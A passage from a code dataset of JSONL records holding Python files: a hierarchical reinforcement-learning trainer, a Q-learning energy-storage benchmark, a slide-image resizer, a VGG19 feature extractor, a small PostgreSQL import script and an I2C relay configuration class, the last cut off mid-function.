iter_0\n if skill_learning and not self.joint:\n self.train_agent_skills(storing_path=storing_path, rewards=rewards, metrics=metrics, iter_0=init_iter)\n init_iter = 0\n \n if q_learning:\n self.agent.memory['sl'].forget()\n if not self.joint:\n self.learning_type = 'ql' \n self.set_envs()\n self.train_agent_skills(storing_path=storing_path, iter_0=init_iter) \n else:\n for i in range(0, self.joint_cycles):\n self.agent.restart_policies()\n self.train_agent_skills(storing_path=storing_path, iter_0=0, joint_warmup=True) \n self.train_agent_skills(storing_path=storing_path, iter_0=init_iter)\n init_iter += self.epsds['tr'][self.learning_type] // self.epsds['eval']['interval']\n init_iter = 
0\n\n self.learning_type = 'cl'\n if concept_learning:\n self.train_agent_concepts(storing_path=storing_path, iter_0=init_iter, losses=losses, entropies=entropies, entropies_2=entropies_2)\n init_iter = 0\n \n if transfer_learning:\n self.agent.memory['ql'].forget()\n self.learning_type = 'tl'\n self.set_envs()\n self.agent.classifier.eval()\n self.train_agent_skills(storing_path=storing_path, iter_0=init_iter)\n \n @property\n def keep_track(self):\n return (self.active_RND and self.learning_type == 'tl') or (self.active_MC and self.learning_type == 'tl')\n\n def train_agent_skills(self, iter_0=0, rewards=[], metrics=[], lengths=[], storing_path='', joint_warmup=False): \n if self.render: self.envs[self.learning_type][self.task].render() \n \n lim_epsd = self.epsds['tr'][self.learning_type] if not joint_warmup else self.epsds['tr']['wu']\n for epsd in range(0, lim_epsd):\n change_env = False if epsd == 0 else True\n self.reset(change_env=change_env)\n iter_ = iter_0 + (epsd+1) // self.epsds['eval']['interval']\n step_counter = 0\n previous_skill = self.task\n if self.keep_track: \n trajectory = []\n if self.active_MC: trajectory_MC = []\n \n for epsd_step in itertools.count(0):\n learn = epsd != 0 or epsd_step+1 > 3*self.batch_size or self.joint\n if self.learning_type == 'tl':\n learn = learn and ((step_counter + 1) % self.steps['update']['tl']) == 0\n done, event, env_steps, previous_skill = self.interaction(learn=learn, lim=self.steps['tr'][self.learning_type]-step_counter, previous_skill=previous_skill, joint_warmup=joint_warmup)[1:]\n\n if self.render: self.envs[self.learning_type][self.task].render()\n if self.keep_track: trajectory.append(event.copy())\n if self.keep_track and self.active_MC: \n S, A, R = event[2*self.s_dim+4], event[self.s_dim], event[self.s_dim+1]\n trajectory_MC.append([S,A,R])\n\n if done: \n self.reset(change_env=False)\n if self.keep_track:\n if self.active_MC:\n self.agent.MC_learning(trajectory_MC)\n trajectory_MC = [] \n 
step_counter += env_steps\n\n if (epsd_step + 1) % (512) == 0 and self.agent.active_intrinsic_learning: # TODO: add 512 to param dict.\n self.agent.intrinsic_learning(trajectory)\n trajectory = []\n\n if step_counter >= self.steps['tr'][self.learning_type] * self.steps['env'][self.learning_type]: \n if self.keep_track: \n if len(trajectory) >= 1:\n if self.active_RND and self.agent.active_intrinsic_learning:\n self.agent.intrinsic_learning(trajectory)\n trajectory = []\n if self.active_MC:\n self.agent.MC_learning(trajectory_MC)\n trajectory_MC = []\n break\n \n if self.multitask_envs[self.learning_type] and ((step_counter+1) % self.steps['MT']) == 0: \n self.MT_task = (self.MT_task + np.random.randint(self.n_MT_tasks-1) + 1) % self.n_MT_tasks \n \n if (epsd+1) % self.epsds['eval']['interval'] == 0 and not joint_warmup:\n st0_random = random.getstate()\n st0 = np.random.get_state() \n st0_rng = self.np_random.get_state()\n st0_torch = torch.get_rng_state() \n if device == \"cuda\": st0_torch_cuda = torch.cuda.get_rng_state() \n st_envs = []\n for env in self.envs[self.learning_type]:\n st_envs.append(env.np_random.get_state())\n \n r, _, m, l = self.eval_agent_skills(explore=(self.learning_type=='sl'), iter_=iter_, store_events=False)\n random.setstate(st0_random)\n np.random.set_state(st0)\n self.np_random.set_state(st0_rng)\n torch.set_rng_state(st0_torch)\n if device == \"cuda\": torch.cuda.set_rng_state(st0_torch_cuda)\n for i, env in enumerate(self.envs[self.learning_type]):\n env.np_random.set_state(st_envs[i])\n\n metrics.append(m)\n rewards += r\n if self.learning_type == 'tl': \n lengths.append(l)\n np.savetxt(storing_path + '/lengths_'+self.learning_type+'.txt', np.array(lengths))\n np.savetxt(storing_path + '/metrics_'+self.learning_type+'.txt', np.array(metrics)) \n \n specific_path = storing_path + '/' + str(iter_)\n self.save(storing_path, specific_path=specific_path)\n np.savetxt(storing_path + '/mean_rewards_'+self.learning_type+'.txt', 
np.array(rewards))\n \n def train_agent_concepts(self, losses=[], entropies=[], entropies_2=[], storing_path='', iter_0=0, min_lr=1e-4, max_lr=3e-4, T=50000, max_tau=5.0, min_tau=1.3, last_steps=50000, max_max_tau=10.0):\n stdscr = curses.initscr()\n curses.noecho()\n curses.cbreak() \n\n for grad_step in range(0, self.steps['tr'][self.learning_type]):\n classifier_loss, HS_T, HS_s, ISs_T, ILBO_AS_T_term1, HA_T, ILBO_AS_T, ILBO_nSS_TdoA_term1, HnS_TdoA, ILBO_nSS_TdoA, cl, ml = self.agent.learn_concepts()\n losses.append([classifier_loss, cl, ml])\n entropies.append([HS_T, HS_s, ISs_T, ILBO_AS_T_term1, HA_T, ILBO_AS_T, ILBO_nSS_TdoA_term1, HnS_TdoA, ILBO_nSS_TdoA])\n\n stdscr.addstr(0, 0, \"Iteration: {}\".format(grad_step))\n stdscr.addstr(1, 0, \"Classifier Loss: {}\".format(np.round(classifier_loss, 4)))\n stdscr.addstr(2, 0, \"Entropy H(S|T): {}\".format(np.round(HS_T, 4)))\n stdscr.addstr(3, 0, \"Entropy H(S|s): {}\".format(np.round(HS_s,4)))\n stdscr.addstr(4, 0, \"MutualInfo I(S:s|T): {}\".format(np.round(ISs_T,4)))\n stdscr.addstr(5, 0, \"Entropy H(A|S,T): {}\".format(np.round(ILBO_AS_T_term1,4)))\n stdscr.addstr(6, 0, \"Entropy H(A|T): {}\".format(np.round(HA_T,4)))\n stdscr.addstr(7, 0, \"MutualInfo I(A:S|T): {}\".format(np.round(ILBO_AS_T,4)))\n stdscr.addstr(8, 0, \"Entropy H(S'|S,T,do(A)) : {}\".format(np.round(ILBO_nSS_TdoA_term1,4)))\n stdscr.addstr(9, 0, \"Entropy H(S'|T,do(A)): {}\".format(np.round(HnS_TdoA,4)))\n stdscr.addstr(10, 0, \"MutualInfo I(S':S|T,do(A)): {}\".format(np.round(ILBO_nSS_TdoA,4)))\n stdscr.addstr(11, 0, \"Policy model loss: {}\".format(np.round(cl, 4)))\n stdscr.addstr(12, 0, \"Transition model loss: {}\".format(np.round(ml, 4)))\n stdscr.refresh()\n\n if (grad_step + 1) % 5000 == 0:\n self.save(storing_path, storing_path+ '/' + str(iter_0+grad_step+1))\n np.savetxt(storing_path + '/concept_training_losses.txt', np.array(losses))\n np.savetxt(storing_path + '/concept_training_entropies.txt', np.array(entropies)) \n \n 
curses.echo()\n curses.nocbreak()\n curses.endwin() \n\n @property\n def entropy_metric(self):\n return self.learning_type == 'sl' or self.agent.stoA_learning_type == 'SAC'\n\n def eval_agent_skills(self, eval_epsds=0, explore=False, iter_=0, start_render=False, print_space=True, specific_path='video', max_step=0, task=None, store_events=True):\n if task is None: \n task = self.task\n self.task = 0\n given_task = False\n if self.multitask_envs[self.learning_type]:\n MT_task = self.MT_task\n self.MT_task = 0\n else:\n self.task = task\n given_task = True\n self.reset()\n\n if start_render: self.envs[self.learning_type][self.task].render()\n if eval_epsds == 0: \n if self.multitask_envs[self.learning_type]:\n eval_epsds = self.epsds['eval'][self.learning_type] * self.n_MT_tasks\n else:\n eval_epsds = self.epsds['eval'][self.learning_type] * self.n_tasks[self.learning_type]\n \n events = []\n rewards = []\n epsd_lengths = []\n min_epsd_reward = 1.0e6\n max_epsd_reward = -1.0e6\n\n if self.entropy_metric:\n Ha_sT = []\n Ha_sT_average = 0.0\n entropy = 'H(a|s,T)' if self.learning_type == 'sl' else 'H(A|s,T)'\n \n if max_step <= 0: max_step = self.steps['eval'][self.learning_type]\n\n for epsd in range(0, eval_epsds):\n step_counter = 0\n\n if self.store_video: video = VideoWriter(specific_path + '_' + str(self.task) + '_' + str(epsd) + '_' + self.learning_type + '.avi', fourcc, float(FPS), (width, height))\n\n change_env = False if epsd == 0 or given_task else True\n self.reset(change_env=change_env) \n epsd_reward = 0.0\n previous_skill = self.task\n\n for eval_step in itertools.count(0): \n reward, done, event, env_steps, previous_skill = self.interaction(remember=False, explore=explore, learn=False, lim=self.steps['tr'][self.learning_type]-step_counter, previous_skill=previous_skill)\n if self.learning_type == 'sl':\n event[self.sa_dim] = reward \n epsd_reward += reward \n if self.learning_type == 'tl':\n step_counter += env_steps \n\n if self.store_video:\n img = 
self.envs[self.learning_type][self.task].render('rgb_array',1024,768)\n video.write(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n elif self.render:\n self.envs[self.learning_type][self.task].render()\n\n if store_events:\n if self.env_names[self.learning_type][self.task] == 'AntCrossMaze-v3':\n goal_position = np.copy(self.envs[self.learning_type][self.task]._goal_position[:2])\n event = np.concatenate([event, goal_position])\n if self.env_names[self.learning_type][self.task] in ['AntGather-v3', 'AntAvoid-v3']:\n object_positions = np.copy(self.envs[self.learning_type][self.task]._object_positions[:,:2].reshape(-1))\n event = np.concatenate([event, object_positions])\n events.append(event)\n\n if done or ((eval_step + 1) >= max_step):\n if self.learning_type != 'tl':\n epsd_lengths.append(eval_step + 1)\n else:\n epsd_lengths.append(step_counter)\n break\n\n metrics = self.agent.estimate_metrics(self.learning_type)\n if self.entropy_metric: \n Ha_sT.append(metrics[entropy])\n Ha_sT_average += (Ha_sT[-1] - Ha_sT_average)/(epsd+1)\n\n rewards.append(epsd_reward)\n min_epsd_reward = np.min([epsd_reward, min_epsd_reward])\n max_epsd_reward = np.max([epsd_reward, max_epsd_reward])\n average_reward = np.array(rewards).mean()\n \n if self.entropy_metric: \n stdout.write(\"Iter %i, epsd %i, %s: %.4f, min r: %i, max r: %i, mean r: %i, epsd r: %i\\r \" %\n (iter_, (epsd+1), entropy, Ha_sT_average, min_epsd_reward//1, max_epsd_reward//1, average_reward//1, epsd_reward//1))\n else:\n stdout.write(\"Iter %i, epsd %i, min r: %.3f, max r: %.3f, mean r: %.3f, epsd r: %.3f\\r \" %\n (iter_, (epsd+1), min_epsd_reward, max_epsd_reward, average_reward, epsd_reward))\n stdout.flush() \n\n self.MT_task = (self.MT_task + 1) % self.n_MT_tasks\n # self.MT_task = (self.MT_task + np.random.randint(self.n_MT_tasks-1) + 1) % self.n_MT_tasks \n\n if print_space: print(\"\")\n\n if self.store_video: video.release()\n metric_vector = np.array([Ha_sT_average]) if self.entropy_metric else np.array([]) \n 
\n if not given_task: \n self.task = task\n if self.multitask_envs[self.learning_type]:\n self.MT_task = MT_task\n return rewards, np.array(events), metric_vector, np.array(epsd_lengths) \n \n def save(self, common_path, specific_path=''):\n self.params['learning_type'] = self.learning_type\n pickle.dump(self.params, open(common_path+'/params.p','wb'))\n self.agent.save(common_path, specific_path, self.learning_type)\n if self.joint: self.agent.save(common_path, specific_path, 'sl')\n \n def load(self, common_path, iter_0_sl=0, iter_0_sl_2=0, iter_0_ql=0, iter_0_cl=0, iter_0_tl=0, load_memory=True): # TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO TODO\n if not self.joint:\n if iter_0_sl > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_sl), 'sl', load_memory=(load_memory and iter_0_ql==0))\n if iter_0_sl_2 > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_sl_2), 'sl_2', load_memory=False)\n if iter_0_ql > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_ql), 'ql', load_memory=(load_memory and iter_0_tl==0))\n if iter_0_cl > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_cl), 'cl')\n if iter_0_tl > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_tl), 'tl', load_memory=load_memory)\n else:\n if iter_0_ql > 0:\n self.agent.load(common_path, common_path + '/' + str(iter_0_ql), 'sl', load_memory=load_memory)\n self.agent.load(common_path, common_path + '/' + str(iter_0_ql), 'ql', load_memory=False)\n\n \n\n","sub_path":"CL.py","file_name":"CL.py","file_ext":"py","file_size_in_byte":76973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"33424434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 21 15:42:29 2021\n\n@author: jmwu\n\"\"\"\n\n\nimport numpy as np\nfrom RL_brain import QLearningTable\nimport warnings\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import 
Sequential\nfrom keras.layers import Dense, Dropout, LSTM\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom keras.callbacks import EarlyStopping\nimport keras.backend as K\nimport keras.initializers as KI\nimport tensorflow as tf\nfrom keras import regularizers\nwarnings.filterwarnings(\"ignore\")\n\nclass BenchmarkInAccurateDemand:\n def __init__(self, Capacity,Window, Ntrain,Ntest,Nvalid, Price,Demand, Renewables,learning_rate,reward_decay,e_greedy,vanish,epochs):\n self.B = Capacity\n self.W = Window\n self.P = Price\n self.D = Demand\n self.R = Renewables\n self.N = Ntrain\n self.T = Ntest\n self.V = Nvalid\n self.S = Ntest\n self.learning_rate = learning_rate\n self.reward_decay = reward_decay\n self.e_greedy = e_greedy\n self.vanish = vanish\n self.epochs = epochs\n\n \n def stepto(self, action,observation,step,p,pbar,d):\n length = len(p)\n pbar = (1-self.vanish)*pbar+self.vanish*observation[0]\n if action == 0:\n reward = 0\n sl = observation[2]\n ch = 0\n dh = 0\n gh = observation[1]\n stepcost = observation[0]*observation[1]\n elif action == 1:\n reward = (observation[0]-pbar)*min(observation[2],observation[1])\n sl = observation[2]-min(observation[2],observation[1])\n ch = 0\n dh = min(observation[2],observation[1])\n gh = observation[1]-min(observation[2],observation[1])\n stepcost = observation[0]*(observation[1]-min(observation[2],observation[1]))\n elif action == 2:\n reward = (pbar-observation[0])*int((self.B-observation[2]))\n sl = observation[2]+int((self.B-observation[2]))\n ch = int((self.B-observation[2]))\n dh = 0\n gh = observation[1]\n stepcost = observation[0]*(observation[1]+int((self.B-observation[2])))\n \n if step == length-1:\n done = True\n observation_ = 'terminal'\n return observation_, reward, done, pbar, stepcost, sl, ch, dh, gh\n else:\n done = False\n observation_ = np.array([p[step+1],d[step+1],sl])\n return observation_, reward, done, pbar, stepcost, sl, ch, dh, gh\n\n def 
train(self, d,p,RL):\n d = np.array(d)\n d = d.reshape(self.N)\n p = np.array(p)\n p = p.reshape(self.N)\n level = np.array([10,10000,10000])\n for episode in range(self.epoch):\n s = 0; step = 0; pbar = p[0]\n observation = np.array([p[0],d[0],s])\n while True:\n temp_ob = observation.copy()/level; temp_ob = temp_ob.astype(int);\n action = RL.choose_action(str(temp_ob))\n observation_, reward, done, pbar, stepcost,sl, ch, dh, gh = self.stepto(action,observation,step,p,pbar,d)\n if observation_== 'terminal':\n RL.learn(str(temp_ob), action, reward, observation_)\n print('terminal episode '+str(episode))\n break\n else:\n temp_ob_ = observation_.copy()/level; temp_ob_ = temp_ob_.astype(int);\n RL.learn(str(temp_ob), action, reward, str(temp_ob_))\n observation = observation_\n step = step + 1\n if step>=(len(d)):\n break\n return RL\n \n def rl(self):\n RL = QLearningTable(actions=list(range(3)),learning_rate = self.learning_rate, reward_decay = self.reward_decay, e_greedy = self.e_greedy)\n RL = self.train(self.D[:self.N],self.P[:self.N],RL)\n level = np.array([10,10000,10000])\n n_interval = int(self.T/self.I); \n cost_rl = np.zeros(n_interval)\n for n in range(1, n_interval+1):\n a_real = self.D[self.N+self.V+(n-1)*self.I:self.N+self.V+n*self.I]\n r_real = self.R[self.N+self.V+(n-1)*self.I:self.N+self.V+n*self.I]\n p_real = self.P[self.N+self.V+(n-1)*self.I:self.N+self.V+n*self.I]\n d_real = (a_real - r_real)\n \n d_real = d_real.astype(int)\n \n d_real = d_real.reshape(len(d_real))\n p_real = p_real.reshape(len(p_real))\n \n s = 0; step = 0;pbar = p_real[0]\n observation = np.array([p_real[0],d_real[0],s])\n while True:\n temp_ob = observation.copy()/level; temp_ob = temp_ob.astype(int);\n action = RL.choose_action(str(temp_ob))\n observation_, reward, done, pbar, stepcost,sl, cd, dd, gd = self.stepto(action,observation,step,p_real,pbar,d_real)\n if observation_== 'terminal':\n cost_rl[n-1] = cost_rl[n-1] + stepcost\n break\n else:\n cost_rl[n-1] = cost_rl[n-1] 
+ stepcost\n observation = observation_\n step = step + 1\n if step>=self.I:\n break\n cost_rl_copy = cost_rl.copy()\n for i in range(len(cost_rl_copy)):\n cost_rl[i] = sum(cost_rl_copy[:i+1])\n return cost_rl\n \n def Aour_demand(self,delta,a,p,xc):\n T = int(len(delta)/2); cost = 0\n x = np.zeros(T)\n \n for t in range(T):\n if xc < a[t]:\n a[t] = a[t] - xc\n xc = 0\n break\n else:\n a[t] = 0\n xc = xc - a[t]\n \n for t in range(T):\n if t == 0 :\n x[t] = min(max(0.0,-min(delta[t],a[t])),self.B)\n vb = max(x[t]-0,0)\n va = a[t]-min(x[t]-0,0)\n cost = cost + (va+vb)*p[t]\n else:\n x[t] = min(max(0.0,x[t-1]-min(delta[t],a[t])),self.B)\n vb = max(x[t]-x[t-1],0)\n va = a[t]-min(x[t]-x[t-1],0)\n cost = cost + (va+vb)*p[t]\n return cost,x[t]\n\n def isDecompose(self,at,x0):\n Acc_sum = 0\n Acc = np.zeros(len(at))\n for i in range(len(at)):\n Acc[i] = Acc_sum + at[i]\n Acc_sum = Acc_sum + at[i]\n AccB = Acc + self.B\n \n sadwAB = np.zeros(int(max(Acc)+1))\n \n for i in range(len(at)):\n if AccB[i] <= max(Acc):\n sadwAB[int(AccB[i])] = 1\n sadwAB[int(Acc[i])] = 1\n \n sadwA = np.zeros(int(max(Acc)+1))\n sadwB = np.zeros(int(max(Acc)+1))\n \n i = 0; j = int(Acc[0]); \n while(j <= max(Acc) and i+1<=len(at)-1):\n while(i+1<=len(at)-1 and Acc[i+1]==Acc[i]):\n try:\n sadwA[j] = i+1\n i = i + 1\n except:\n break\n while(i+1<=len(at)-1 and Acc[i+1]>Acc[i]):\n k = Acc[i+1]-Acc[i]\n try:\n sadwA[j] = i + 1\n except: \n break\n while(k > 0):\n j = j + 1\n try:\n sadwA[j] = i + 1\n k = k - 1\n except:\n break\n i = i + 1\n \n i = 0; j = int(AccB[0]); \n while(j <= max(Acc) and i+1<=len(at)-1):\n while(i+1<=len(at)-1 and AccB[i+1]==AccB[i]):\n i = i + 1\n while(i+1<=len(at)-1 and AccB[i+1]>AccB[i]):\n k = AccB[i+1]-AccB[i]\n while(k > 0):\n j = j + 1\n try:\n sadwB[j] = i + 1\n k = k - 1\n except:\n break\n i = i + 1\n \n a_index =np.where(sadwAB==1)[0]\n \n a = [];ts = [];tnz = [];\n for i in range(len(a_index)-1):\n a.append(a_index[i+1]-a_index[i])\n 
ts.append(sadwB[a_index[i+1]])\n tnz.append(sadwA[a_index[i]])\n \n Trunc_sum = a[0]; t = 0; del_list = [];\n while(Trunc_sum <= x0):\n del_list.append(t)\n t = t + 1\n try:\n Trunc_sum = Trunc_sum + a[t]\n except:\n break\n \n for i in del_list:\n del a[i]\n del ts[i]\n del tnz[i]\n a[0] = Trunc_sum - x0\n return a, ts, tnz\n\n\n def Aofl(self,ts,tnz,abar,p):\n mu_c = 1000000; mu_d =1000000\n a = np.zeros(len(p))\n a[int(tnz)] = abar\n xt = np.zeros(len(p))\n dt = np.zeros(len(p))\n vat = np.zeros(len(p))\n vbt = np.zeros(len(p))\n try:\n p_min = min(p[int(ts):int(tnz+1)])\n except:\n p_min = 1e8\n \n if p[int(ts)]==p_min:\n dt[int(ts)] = 0\n vat[int(ts)] = a[int(ts)]\n vbt[int(ts)] = min(max(abar-0,0),mu_c)\n xt[int(ts)] = 0 + vbt[int(ts)] - dt[int(ts)]\n else:\n dt[int(ts)] = min(a[int(ts)],mu_d,0)\n vat[int(ts)] = a[int(ts)]-dt[int(ts)]\n vbt[int(ts)] = 0\n xt[int(ts)] = 0 + vbt[int(ts)] - dt[int(ts)]\n \n for t in range(int(ts+1),int(tnz)):\n if p[t] == p_min:\n dt[t] = 0\n vat[t] = a[t]\n vbt[t] = min(max(abar-xt[t-1],0),mu_c)\n xt[t] = xt[t-1] + vbt[t] - dt[t]\n else:\n dt[t] = min(a[t],mu_d,xt[t-1])\n vat[t] = a[t]-dt[t]\n vbt[t] = 0\n xt[t] = xt[t-1] + vbt[t] - dt[t]\n \n dt[int(tnz)] = min(a[int(tnz)],mu_d,xt[int(tnz-1)])\n vat[int(tnz)] = a[int(tnz)]-dt[int(tnz)]\n vbt[int(tnz)] = 0\n xt[int(tnz)] = xt[int(tnz-1)] + vbt[int(tnz)] - dt[int(tnz)]\n \n return xt,dt,vat,vbt\n \n def Aofl_hat(self,ao,po,xc):\n a = ao.copy() ; p = po.copy()\n x = np.zeros(int(len(a)))\n d = np.zeros(int(len(a)))\n va = np.zeros(int(len(a)))\n vb = np.zeros(int(len(a)))\n x0 = xc; x[0] = 0\n abar, ts, tnz = self.isDecompose(a,x0)\n cost_shot = np.zeros(len(a))\n for i in range(len(abar)):\n xt,dt,vat,vbt = self.Aofl(ts[i],tnz[i],abar[i],p)\n for t in range(int(ts[i]),int(tnz[i]+1)):\n x[t] = x[t] + xt[t]\n d[t] = d[t] + dt[t]\n va[t] = va[t] + vat[t]\n vb[t] = vb[t] + vbt[t]\n a[t] = a[t] - dt[t] - vat[t]\n if vat[t]+vbt[t]>0:\n cost_shot[t] = cost_shot[t] + 
p[t]*(vat[t]+vbt[t])\n return x,d,va,vb,cost_shot\n \n def ofl(self):\n n_interval = int(self.T/self.I)\n cost_ofl = np.zeros(n_interval)\n for n in range(1, n_interval+1):\n a_real = self.D[self.N+self.V:self.N+self.V+n*self.I]\n r_real = self.R[self.N+self.V:self.N+self.V+n*self.I]\n p_real = self.P[self.N+self.V:self.N+self.V+n*self.I]\n d_real = (a_real - r_real)\n \n d_real = d_real.astype(int); d_real = np.r_[np.array(0),d_real]\n p_real = np.r_[np.array(self.P[self.N+self.V-1]),p_real]\n \n x,d,va,vb,cost_shot = self.Aofl_hat(d_real,p_real,0)\n cost_ofl[n-1] = sum(cost_shot)\n return cost_ofl","sub_path":"modelselection_sys/benchmark_q.py","file_name":"benchmark_q.py","file_ext":"py","file_size_in_byte":11641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633596113","text":"import cv2\r\nimport numpy as np\r\nfrom openslide import OpenSlide\r\n\r\n\r\ndef save_slide_cutting(\r\n file_path,\r\n multiple,\r\n # save_path\r\n):\r\n slide = OpenSlide(file_path)\r\n slide_downsamples = slide.get_best_level_for_downsample(multiple)\r\n downsample = slide.level_downsamples[slide_downsamples]\r\n w_lv_, h_lv_ = slide.level_dimensions[slide_downsamples]\r\n wsi_pil_lv_ = slide.read_region(\r\n (0, 0),\r\n slide_downsamples,\r\n (w_lv_, h_lv_))\r\n wsi_ary_lv_ = np.array(wsi_pil_lv_)\r\n wsi_bgr_lv_ = cv2.cvtColor(wsi_ary_lv_, cv2.COLOR_RGBA2BGR)\r\n\r\n downsample = multiple / downsample\r\n w = int(w_lv_ / downsample)\r\n h = int(h_lv_ / downsample)\r\n img = cv2.resize(wsi_bgr_lv_, (w, h), interpolation=cv2.INTER_LINEAR)\r\n # cv2.imwrite(img, save_path)\r\n return img\r\n","sub_path":"test/data/make_slide_cutting.py","file_name":"make_slide_cutting.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"532534031","text":"# The implementation is based on 
https://github.com/anishathalye/neural-style/blob/master/vgg.py\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.io\n\n\nclass VGG19:\n \"\"\"\n A class for the loss network\n \"\"\"\n\n layers = (\n \"conv1_1\",\n \"relu1_1\",\n \"conv1_2\",\n \"relu1_2\",\n \"pool1\",\n \"conv2_1\",\n \"relu2_1\",\n \"conv2_2\",\n \"relu2_2\",\n \"pool2\",\n \"conv3_1\",\n \"relu3_1\",\n \"conv3_2\",\n \"relu3_2\",\n \"conv3_3\",\n \"relu3_3\",\n \"conv3_4\",\n \"relu3_4\",\n \"pool3\",\n \"conv4_1\",\n \"relu4_1\",\n \"conv4_2\",\n \"relu4_2\",\n \"conv4_3\",\n \"relu4_3\",\n \"conv4_4\",\n \"relu4_4\",\n \"pool4\",\n \"conv5_1\",\n \"relu5_1\",\n \"conv5_2\",\n \"relu5_2\",\n \"conv5_3\",\n \"relu5_3\",\n \"conv5_4\",\n \"relu5_4\",\n )\n\n def __init__(self, data_path):\n data = scipy.io.loadmat(data_path)\n\n self.mean_pixel = np.array([123.68, 116.779, 103.939])\n\n self.weights = data[\"layers\"][0]\n\n def preprocess(self, image):\n return image - self.mean_pixel\n\n def undo_preprocess(self, image):\n return image + self.mean_pixel\n\n def feed_forward(self, input_image, scope=None):\n net = {}\n current = input_image\n\n with tf.compat.v1.variable_scope(scope):\n for i, name in enumerate(self.layers):\n kind = name[:4]\n if kind == \"conv\":\n kernels = self.weights[i][0][0][2][0][0]\n bias = self.weights[i][0][0][2][0][1]\n\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n bias = bias.reshape(-1)\n\n current = conv_layer(current, kernels, bias)\n elif kind == \"relu\":\n current = tf.nn.relu(current)\n elif kind == \"pool\":\n current = pool_layer(current)\n net[name] = current\n\n return net\n\n\ndef conv_layer(input, weights, bias):\n conv = tf.nn.conv2d(\n input, tf.constant(weights), strides=(1, 1, 1, 1), padding=\"SAME\"\n )\n return tf.nn.bias_add(conv, bias)\n\n\ndef pool_layer(input):\n return tf.nn.max_pool(\n input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1), padding=\"SAME\"\n )\n\n\ndef preprocess(image, mean_pixel):\n return image - 
mean_pixel\n\n\ndef undo_preprocess(image, mean_pixel):\n return image + mean_pixel","sub_path":"code/johnson/vgg19.py","file_name":"vgg19.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"230125839","text":"import queries\nimport pandas as pd\nimport geopandas as gpd\nfrom sqlalchemy import create_engine\nimport psycopg2\n\nengine = create_engine(f'postgresql+psycopg2://postgres:Password@localhost:5432/test_counties')\n\n\ndef fix_chmura_counties():\n counties = queries.counties_query()\n counties.set_index(['State', 'County Name'], inplace=True)\n ch_df = queries.generic_select_query('chmura_economic_vulnerability_index',\n ['fips', 'name', 'VulnerabilityIndex', 'Rank', 'state', 'county_id'])\n print(ch_df.shape)\n for i, row in ch_df.iterrows():\n if pd.isnull(row['county_id']):\n try:\n ch_df.at[i, 'county_id'] = counties.loc[row['state'], row['name']]['county_id']\n except KeyError:\n print(row['state'], row['name'])\n # print(ch_df.loc[row['state'],row['name']])\n queries.write_table(ch_df, 'chmura_economic_vulnerability_index')\n return\n\n\ndef populate_table(path: str, name: str):\n df = pd.read_csv(path)\n df.drop(['index'], inplace=True, axis=1)\n df.to_sql(name, engine, if_exists='replace', method='multi', index=False)\n\n\ndef import_geojson():\n gdf=gpd.read_file('temp/USA_Counties.geojson', rows=2)\n gdf['geometry'].apply(lambda x: print(type(x)))\n # print(gdf.head())\n\n\n\n\nif __name__ == '__main__':\n # fix_chmura_counties()\n # populate_table('temp/household_job_availability.csv', 'household_job_availability_new')\n import_geojson()","sub_path":"scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"135057556","text":"import os\nimport os.path\nimport yaml #needs python3-yaml\nimport json\nimport io\nfrom relay import 
Relay\n\n# Configuration file\nCONFIG_FILE = os.getenv('I2C_CONFIG_FILE', \"/tmp/config.yaml\")\n\n#####################################\n# Relays #\n#####################################\n\nclass Relays:\n __relays = {}\n\n @staticmethod\n def get_relay(id):\n return Relays.__relays[id]\n\n @staticmethod\n def get_relays():\n return Relays.__relays.values()\n\n @staticmethod\n def get_relays_len():\n return len(Relays.get_relays())\n\n @staticmethod\n def is_valid_relayIndex(index):\n return (index >= 0) & (index < Relays.get_relays_len())\n\n @staticmethod\n def is_valid_relayId(id):\n return id in Relays.__relays.keys()\n\n @staticmethod\n def get_relay_byIndex(index):\n if not Relays.is_valid_relayIndex(index):\n raise ValueError(\"Relay index outside range\", index, \"Min Value:\", 0, \"Max Value:\", Relays.get_relays_len()-1)\n return Relays.get_relays()[index]\n\n @staticmethod\n def append(relay):\n Relays.__relays[relay.get_id()] = relay\n\n @staticmethod\n def add(relayStr):\n relay_raw = json.loads(relayStr)\n relay = Relay(**relay_raw)\n Relays.append(relay)\n Relays.write_config()\n return relay\n\n @staticmethod\n def delete(id):\n del Relays.__relays[id]\n Relays.write_config()\n\n @staticmethod\n def read_config():\n # Example\n #\n # relays:\n # - bus: 1\n # data_address: 0\n # description: ''\n # device_address: 16\n # name: Relay_0\n # notes: ''\n if os.path.exists(CONFIG_FILE):\n # Read existing config\n print(\"Reading \"+CONFIG_FILE)\n with open(CONFIG_FILE, 'r') as stream:\n config = yaml.safe_load(stream)\n relays_raw = config['relays']\n for relay_raw in relays_raw:\n Relays.append(Relay(**relay_raw))\n else:\n # Generate default config\n print(\"Creating \"+CONFIG_FILE)\n config = {}\n config['relays'] = []\n # Save initial config\n Relays.write_config()\n\n @staticmethod\n def write_config():\n config = {}\n config['relays'] = Relays.get_relays_raw()\n print(\"Writing configuration\",CONFIG_FILE)\n # Write YAML file\n with 
